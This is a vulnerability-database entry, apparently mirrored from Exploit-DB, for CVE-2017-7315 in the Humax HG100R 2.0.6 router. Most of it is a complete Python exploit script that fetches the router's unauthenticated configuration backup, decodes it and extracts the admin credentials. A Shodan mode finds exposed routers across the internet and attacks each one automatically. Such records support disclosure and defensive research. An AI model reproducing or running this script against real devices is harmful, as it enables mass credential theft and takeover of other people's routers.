ID
VAR-E-201706-0189
EDB ID
42284
TITLE
Humax HG100R 2.0.6 - Backup File Download - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Humax HG100R 2.0.6 - Backup File Download.. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | humax | model: | hg100r | scope: | eq | version: | 2.0.6 | Trust: 1.6 |
EXPLOIT
# coding: utf-8
# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315
import sys
import base64
import shodan
import requests
import subprocess
def banner():
print '''
██░ ██ █ ██ ███▄ ▄███▓ ▄▄▄ ▒██ ██▒
▓██░ ██▒ ██ ▓██▒▓██▒▀█▀ ██▒▒████▄ ▒▒ █ █ ▒░
▒██▀▀██░▓██ ▒██░▓██ ▓██░▒██ ▀█▄ ░░ █ ░
░▓█ ░██ ▓▓█ ░██░▒██ ▒██ ░██▄▄▄▄██ ░ █ █ ▒
░▓█▒░██▓▒▒█████▓ ▒██▒ ░██▒ ▓█ ▓██▒▒██▒ ▒██▒
▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░ ░ ░ ▒▒ ▓▒█░▒▒ ░ ░▓ ░
▒ ░▒░ ░░░▒░ ░ ░ ░ ░ ░ ▒ ▒▒ ░░░ ░▒ ░
░ ░░ ░ ░░░ ░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░
'''
print 'Description: Humax HG100R backup file download'
print 'Software Version: VER 2.0.6'
print 'SDK Version: 5.7.1mp1'
print 'IPv6 Stack Version: 1.2.2'
print 'Author: Gambler'
print 'Vulnerability founded: 14/03/2016'
print 'CVE: waiting'
print
def xplHelp():
print 'Exploit syntax error, Example:'
print 'python xpl.py http://192.168.0.1'
def exploit(server):
path = '/view/basic/GatewaySettings.bin'
if not server.startswith('http'):
server = 'http://%s' % server
if server.endswith('/'):
server = server[:-1]+''
url = '%s/%s' %(server,path)
print '[+] - Downloading configuration file and decoding'
try:
r = requests.get(url, stream=True,timeout=10)
for chunk in r.iter_content(chunk_size=1024):
if chunk:
rawdata = r.content
save(rawdata)
except:
pass
def save(rawdata):
config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
open('config.txt', 'w').write(config)
print '[+] - Done, file saved as config.txt'
infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
print '[+] - Credentials found'
print infos
def shodanSearch():
SHODAN_API_KEY = "SHODAN_API_KEY"
api = shodan.Shodan(SHODAN_API_KEY)
try:
results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
print 'Results found: %s' % results['total']
for result in results['matches']:
router = 'http://%s:%s' % (result['ip_str'],result['port'])
print router
exploit(router)
except shodan.APIError, e:
print 'Error: %s' % e
if __name__ == '__main__':
if len(sys.argv) < 2:
xplHelp()
sys.exit()
banner()
if sys.argv[1] == 'shodan':
shodanSearch()
else:
exploit(sys.argv[1])
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Backup File Download
Trust: 1.6
CREDITS
gambler
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 42284 | Trust: 1.6 |
| db: | EDBNET | id: | 93400 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/42284/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 42284 |
| db: | EDBNET | id: | 93400 |
LAST UPDATE DATE
2022-07-27T09:40:01.114000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 42284 | date: | 2017-06-30T00:00:00 |
| db: | EDBNET | id: | 93400 | date: | 2017-06-30T00:00:00 |